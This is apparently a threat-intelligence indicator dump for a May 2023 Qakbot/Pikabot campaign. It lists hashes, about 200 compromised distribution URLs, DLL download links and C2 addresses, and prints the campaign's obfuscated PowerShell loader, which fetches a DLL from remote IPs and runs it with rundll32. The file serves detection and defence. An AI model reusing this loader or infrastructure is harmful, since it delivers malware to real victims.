/
Qakbot_BB28_Pikabot_18.05.2023.txt
289 lines (274 loc) · 12.2 KB
/
Qakbot_BB28_Pikabot_18.05.2023.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
18.05.2023 | Qakbot / Pikabot | BB28 | Campaign | Version
*************************************************
.url https://123mkv.dev/iia/?1
.js 1015b0f17a4a19921e44338e91f937def92b0f497a74e1de46654a0986fc7646
.dll 8ee9141074b48784c89aa5d3cd4010fcf4e6d467b618c8719970f78fcc24a365
*************************************************
Exec >
wscript.exe C:\Users\Admin\AppData\Local\Temp\Fgdi.js
wscript.exe C:\Users\Admin\AppData\Local\Temp\Fgdi.js ExtirpationistStronglike Theologizing deepmouthed Micropegmatite
powershell.exe - WindowStyle Hidden - ExecutionPolicy Bypass - NoLogo - NoProfile - encodedcommand $Preexchanged = "aAB0AHQAcABzADoALwAvAFQAbwBrAGUAbgBzAC4AZgB5AGkAroaAB0AHQAcABzADoALwAvAFAAbABvAHcAbQBlAG4AQQBsAGwAbwB5AGEAZwBlAC4AYwByAHUAaQBzAGUAcwA=roaAB0AHQAcAA6AC8ALwAxADYAMAAuADQANQAuADUANQAuADEAOQAyAA==";
$Xenopeltid = "aAB0AHQAcABzADoALwAvADIANAAwAC4ANgA5AC4AMQAwADUALgAyADIANQA=kyaAB0AHQAcAA6AC8ALwAxADgANwAuADEAOAAxAC4ANQAzAC4AMQAyADAAkyaAB0AHQAcABzADoALwAvADQAMwAuADIAMgA1AC4AMQAzADcALgA4ADIAkyaAB0AHQAcABzADoALwAvAEIAeQBwAGEAcwBzAGUAZAAuAGMAbwBtAA==";
Start - Sleep - Seconds 9;
$ceratophrysCriocephalus = "aAB0AHQAcABzADoALwAvAEkAbgB0AGUAcgBtAGUAbgBzAHQAcgB1AHUAbQBVAG4AcABhAG4AbgBpAGUAcgBlAGQALgB0AG8AawB5AG8AfRxaAB0AHQAcABzADoALwAvAGEAYwBpAGQAbwBsAG8AZwB5AC4AcQB1AGUAYgBlAGMA";
$Vacationers = "aAB0AHQAcAA6AC8ALwBVAG4AdwBpAG4AdAByAHkALgBnAHMAaUOaAB0AHQAcAA6AC8ALwByAGUAcAByAGUAcwBlAG4AdABhAG0AZQBuAC4AcwBvAGwAYQByAA==aUOaAB0AHQAcABzADoALwAvADIAMwAzAC4AOQA3AC4AMgA1ADEALgAxADcANAA=aUOaAB0AHQAcAA6AC8ALwBEAG8AbABsAGEAcgBiAGkAcgBkAEcAZQBvAGMAaABlAG0AaQBzAHQAcgB5AC4AaQBuAHMAdABpAHQAdQB0AGUA";
$celioncusSacrilegiousness = "http://77.91.85.124/pNXY/wUA7n http://176.124.198.214/rAAOuv6/DBJLR http://77.91.87.226/2kUY1F/yEZhqwIFC8R0";
foreach($qantar in $celioncusSacrilegiousness - split "yF") {
$defeatsPreassumption = "aAB0AHQAcAA6AC8ALwBBAGIAagB1AGQAaQBjAGEAdABpAG8AbgBWAGkAbABsAGEAaQBuAGUAcwBzAC4AZwByAGkAcABlAA==";
try {
$Fricatrice = "aAB0AHQAcAA6AC8ALwAyADQANAAuADEAMwAxAC4AMQAyADQALgAyADIAMQA=aRwIaAB0AHQAcABzADoALwAvAE0AYQB1AHAAYQBzAHMAYQBuAHQALgBjAG8AZABlAHMA";
$raidingDefectlessness = "aAB0AHQAcAA6AC8ALwA3ADQALgAxADgAMgAuADEAOAA1AC4AMQAwADgA";
$Plebiscitarism = "aAB0AHQAcABzADoALwAvADEAOQA1AC4AMgA0ADEALgAyADAAMQAuADgANAA==oTaAB0AHQAcAA6AC8ALwBEAGUAdABpAG4AZQB0AFQAaAB5AHIAbwBpAGQAZQBhAGwALgBjAHIAaQBjAGsAZQB0AA===oTaAB0AHQAcAA6AC8ALwAxADQANgAuADEAOAA5AC4AMQA3ADMALgAxADQAMQA==oTaAB0AHQAcAA6AC8ALwBuAGUAcABoAHIAbwBwAHMALgBrAGkAdwBpAA==";
$unwrapperedProtoporphyrin = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($qantar));
iwr $unwrapperedProtoporphyrin - O $env: TEMP\ amphibolostylous.grommets;
$Extollation = "aAB0AHQAcABzADoALwAvAFYAYQBsAGsAeQByAGkAYQBPAHYAZQByAGMAaQByAGMAdQBsAGEAdABlAC4AbABlAGEAcwBlAA==xRaAB0AHQAcABzADoALwAvADEAMAA3AC4AMgAxADQALgAxADEAMgAuADEANgA3AA==xRaAB0AHQAcAA6AC8ALwA4ADkALgAxADMANQAuADEAMgA4AC4AMgA0ADUA";
if ((Get - Item - Path $env: TEMP\ amphibolostylous.grommets).Length - ge 250435) {
powershell - encodedcommand "start rundll32 $env:TEMP\amphibolostylous.grommets,Test;Expressjs";
$bridesmaidingPlaintiveness = "aAB0AHQAcABzADoALwAvAGIAbwBvAHQAZQBlAHMALgBxAHUAZQBiAGUAYwA=mKaAB0AHQAcAA6AC8ALwA5ADYALgAyADAANAAuADIAMQA0AC4AMQAzADUAmKaAB0AHQAcABzADoALwAvADEAMQA0AC4AMQAxADcALgAyADAAOAAuADEAMgAxAA==mKaAB0AHQAcAA6AC8ALwA1ADYALgAyADEANAAuADEANQAwAC4ANwAxAA==";
$PoultrydomLipide = "aAB0AHQAcABzADoALwAvAHQAYQBpAGwAbwByAGwAeQBTAGUAbQBpAGQAZQB0AGUAcgBtAGkAbgBpAHMAdABpAGMALgBpAG0AbQBvAGIAaQBsAGkAZQBuAA==OtlaAB0AHQAcABzADoALwAvADEANgAxAC4ANwA2AC4AOAAyAC4AMQAyADcAOtlaAB0AHQAcAA6AC8ALwA0ADAALgAxADMANAAuADEAMAA5AC4AMQA5ADUA";
$chokermanForfault = "aAB0AHQAcABzADoALwAvAEwAbwBvAGYAaQBlAC4AZwBvAGwAZgA=hFKaAB0AHQAcABzADoALwAvADEANgAzAC4AOAA2AC4AMgAyADEALgAyADMANgA=hFKaAB0AHQAcAA6AC8ALwAxADcAMwAuADIAMgA5AC4AMQA4ADEALgAxADAAMgA=";
break;
}
Expressjs;
} catch {
$placaeanObtected = "aAB0AHQAcAA6AC8ALwBlAG4AdABpAHIAZQB0AHkAQQBmAGYAZQBjAHQAZQBkAC4AcABhAHIAdABuAGUAcgBzAA==aaAB0AHQAcABzADoALwAvADEAOAAxAC4AMQAwADIALgA4ADQALgAxADcAOAA=";
$HlorrithiTurdetan = "aAB0AHQAcAA6AC8ALwBCAGEAcwBhAGwAdABpAGYAbwByAG0ARABlAHQAbwBuAGEAdABvAHIALgBjAHIAaQBjAGsAZQB0AA==";
$UnpuzzledSpeculate = "aAB0AHQAcAA6AC8ALwAxADUAOAAuADEANgA1AC4ANQAyAC4AMQA2ADcAbaAB0AHQAcABzADoALwAvAHMAcAByAHUAcwBoAC4AcwBpAA==baAB0AHQAcABzADoALwAvAG4AbwBuAGkAbgB0AHIAdQBzAGkAbwBuAGkAcwBtAC4AcwB0AHIAZQBhAG0A";
}
}
$lasarwortArborolatry = "aAB0AHQAcAA6AC8ALwBTAHkAbABsAGEAYgBpAGYAaQBlAGQALgBiAHUAcwBpAG4AZQBzAHMA";
$syngamicMetrocarcinoma = "aAB0AHQAcAA6AC8ALwAxADQAMwAuADEAMwAzAC4ANQA0AC4AMQA2ADQA";
*************************************************
.zip distro
https://123mkv.dev/mmi/?1
https://aamazehomes.com/cqsu/?1
https://abuylike.com/or/?1
https://acontecimientomundial.com/asuq/?1
https://adhyaystudio.com/as/?1
https://afreak.net/tor/?1
https://albarakatilaw.com/aaeu/?1
https://alberthvac1.com/mua/?1
https://allsimpackages.com/ae/?1
https://altaknyia.com/si/?1
https://amazonbirding.com/ial/?1
https://aprendainvestimentos.com/or/?1
https://ar-albania.com/nei/?1
https://asgharintl.net/uu/?1
https://audan.org/ssi/?1
https://autobom.org/eo/?1
https://awamia.com/cii/?1
https://ayyublabs.com/sduq/?1
https://batsamco.com/vulq/?1
https://bespokecj.com/mp/?1
https://besteducationlearn.com/teta/?1
https://bestosoftpro.com/muo/?1
https://bestvfxtraining.com/ti/?1
https://bgcityhotel.com/ilo/?1
https://bhbmaterials.com/cu/?1
https://biddyaniketonhighschool.com/isf/?1
https://bikinberkas.com/uv/?1
https://bimskol.org/ur/?1
https://biocoreopen.org/no/?1
https://biolablaboratorio.com/momi/?1
https://bmetal.co.uk/lno/?1
https://book-of-spells.com/euat/?1
https://book4noon.com/uiiu/?1
https://bookingdone.com/od/?1
https://bowwowavenue.com/enc/?1
https://bugscrum.com/dua/?1
https://cambodiandrivers.com/auso/?1
https://cbcmodesto.org/qma/?1
https://chiomastech.com/opn/?1
https://cloud47options.com/irdp/?1
https://cointrasur.com/siuc/?1
https://dankory.com/oemn/?1
https://darwinrhodes.com/lu/?1
https://datastatresearch.org/xpa/?1
https://delwanqatar.com/qaa/?1
https://dgisafe.com/aet/?1
https://dhfconstructionllc.com/ial/?1
https://dinaseithigal.com/umo/?1
https://divine-project.com/ne/?1
https://doidealbest.com/cie/?1
https://drive33.com/mo/?1
https://dwh-warenhandel.de/ta/?1
https://e-sophtgh.com/euc/?1
https://eagleuhd.com/ttae/?1
https://edusyms.org/tu/?1
https://ejbreneman.com/noo/?1
https://elibact.com/aeat/?1
https://elsassdestination.fr/tena/?1
https://esjpakistan.com/ndie/?1
https://etiskin.com/be/?1
https://examstospl.com/gnu/?1
https://fiestashawaianas.com/tar/?1
https://flixfallen.com/oi/?1
https://fondationmms.org/cb/?1
https://freebiezz.com/upet/?1
https://fsclbd.com/mtls/?1
https://futureadvisorconsultant.com/seia/?1
https://garagedoorrepairgrovelandma.com/eaqe/?1
https://garagedoorrepairhalifax.com/eera/?1
https://genesisoman.com/aluq/?1
https://golfviewhotelsuites.com/ituq/?1
https://govinacademy.com/nn/?1
https://gprproperty.com/uqaq/?1
https://growtharbor.com/mtl/?1
https://grupoexpoinout.com/eam/?1
https://gyanankurschool.com/tt/?1
https://haldoediames.com/cetn/?1
https://heissa-artie.com/ni/?1
https://helptimize.com/nl/?1
https://hirabsun.com/mie/?1
https://hypemediang.com/un/?1
https://ia-bc.com/adne/?1
https://ilcerchio-gruppoanalisi.it/omcs/?1
https://imagecolorist.com/tov/?1
https://imanagementpro.com/ipt/?1
https://imobiliariadigitalimoveis.com/aquu/?1
https://innoshopz.com/mis/?1
https://instantfunnellab.com/anis/?1
https://isac.net.in/ta/?1
https://itstoreindia.com/aqe/?1
https://jacksonkatz.com/dia/?1
https://jaridh.com/ma/?1
https://jobs-sa.net/ei/?1
https://jojoexports.com/rde/?1
https://joker123truewallet.net/tes/?1
https://jyothyvidyalaya.org/ansd/?1
https://kaleidoscoperocks.com/utes/?1
https://karwanfoodstuffs.com/tdse/?1
https://kingspalaceacademy.com/aeat/?1
https://lacasadespain.com/uii/?1
https://lambourndigital-webdev.com/ist/?1
https://lebapedia.com/ma/?1
https://lesbonscontacts.fr/ere/?1
https://lokhandwalaminerva.com/ttu/?1
https://lotusmont.com/etiq/?1
https://luicompressor.com/is/?1
https://lyhourgroup.com/imt/?1
https://maadalmill.com/dsml/?1
https://mambulaocabletv.com/mpae/?1
https://masr-alalmanya.com/au/?1
https://meetxgirls.com/dud/?1
https://mena-studies.org/ni/?1
https://minertecnologia.com/li/?1
https://missredwine.com/eu/?1
https://mnjgroup.net/mtu/?1
https://morningstarfoundation.org.ng/acvo/?1
https://mortalflix.com/rpe/?1
https://myiclicktv.com/pl/?1
https://neelikon.co.uk/sa/?1
https://noor786110.com/ess/?1
https://nutriapt.com/mnei/?1
https://om-services.co.uk/ou/?1
https://onlinequranforkids.com/ilh/?1
https://onlinetv23.com/fre/?1
https://opencarboncredits.com/cm/?1
https://opponepalcampaigns.com/aou/?1
https://optimalsolutionsonline.com/sb/?1
https://patmypets.com/sac/?1
https://pattersonoil.co.uk/ee/?1
https://pcssignal.com/se/?1
https://perchstoneandgraeys.com/eu/?1
https://perfectgadgetbd.com/su/?1
https://persiancarpetcompany.com/iasi/?1
https://pfixs.com/sr/?1
https://pipclass.com/atam/?1
https://plasticmetal.it/aeo/?1
https://poshcutz.com/idoo/?1
https://position1seo.co.uk/emeu/?1
https://pricelala.com/srs/?1
https://prixpharma.com/reib/?1
https://prosoftitservices.com/siu/?1
https://publiext.com/re/?1
https://questmedicalimaging.com/emmm/?1
https://rafaelamayaoficial.com/uam/?1
https://re-corre.com/qoxu/?1
https://redway4council.com/iqae/?1
https://reebootwellness.com/me/?1
https://reposebay.com/rii/?1
https://researchwritingexperts.com/tei/?1
https://rishtedar.com/deot/?1
https://rite-tags.com/ulr/?1
https://sahityaclasses.com/bst/?1
https://salesoxigen.com/utiq/?1
https://salmanpoultry.com/eqbu/?1
https://santiagotrader.com/tio/?1
https://scmsgroup.org/otag/?1
https://seedsindia.org/uae/?1
https://sercompublicidad.net/st/?1
https://shilhaandara.com/lru/?1
https://shotvet.com/iul/?1
https://simcomm.com/ota/?1
https://simracingpoint.com/eurr/?1
https://skillprism.org/tau/?1
https://skyparktravel.com/ca/?1
https://slglebanon.org/ped/?1
https://stacksmind.com/et/?1
https://standardlife.org.ng/oiel/?1
https://streamingbage.net.br/tor/?1
https://studemate.com/lm/?1
https://stylgasmic.com/bn/?1
https://suadienlanhthuduc.com/us/?1
https://sufirfan.org/lvu/?1
https://sugarnusantara.com/oot/?1
https://sumeetgroup.com/aa/?1
https://summapaincare.com/ou/?1
https://talentopportunities.net/nmnu/?1
https://tebiyu.com/mis/?1
https://techafresh.com/epia/?1
https://telecompunch.com/ql/?1
https://thebossstory.com/qise/?1
https://thedesignors.com/pu/?1
https://theheadsoccerunblocked.com/am/?1
https://thekingflix.com/umo/?1
https://theman-cave.com/oet/?1
https://thephoolmala.com/ties/?1
https://theuaemart.com/va/?1
https://tipsfreehealth.com/ovca/?1
https://tollywoodindustry.com/ti/?1
https://torunit.com/uud/?1
https://tovecpharma.com/iil/?1
https://treaty4news.com/sot/?1
https://trentosignal.com/ig/?1
https://trentosignal.com/qer/?1
https://trinifieds.com/tmlp/?1
https://tudien.org.vn/dif/?1
https://twoblokestrading.com/euu/?1
https://uaelistingsonline.com/rg/?1
https://ugssecurity.com/od/?1
https://valeinformado.com/alpt/?1
https://vedrishi.com/suui/?1
https://visaexpressbd.com/mmii/?1
https://voxforem.co.uk/qou/?1
https://web3solution.com/ists/?1
https://webcloner.net/soae/?1
https://wefoundworld.com/eeba/?1
https://wheretobuyelectronics.com/sali/?1
https://windowcollections.com/eoap/?1
https://winpeforum.com/ios/?1
https://wiseflys.com/pro/?1
https://wji.org.in/euvl/?1
https://worldjuniorshockey.com/deo/?1
https://worldsanalytics.com/solt/?1
https://worldtravel-trip.com/iit/?1
https://xpia-i.com/es/?1
https://yarrowenterprise.com/ut/?1
https://yayasanadeazhar.com/mucu/?1
https://yoursoutherngrill.com/sc/?1
https://zulfiyya.com/ut/?1
https://zulfiyya.com/ut/?1
.dll distro
http://77.91.87.226/2kUY1F/53UFrK
http://77.91.85.124/pNXY/s495BLC
http://176.124.198.214/rAAOuv6/IklFOWuh
*************************************************
c2's
192.9.135.73:1194
45.85.235.39:2078
129.80.164.200:32999
129.153.135.83:2078
129.213.54.49:2078
192.213.54.49:2078
104.233.193.227:2078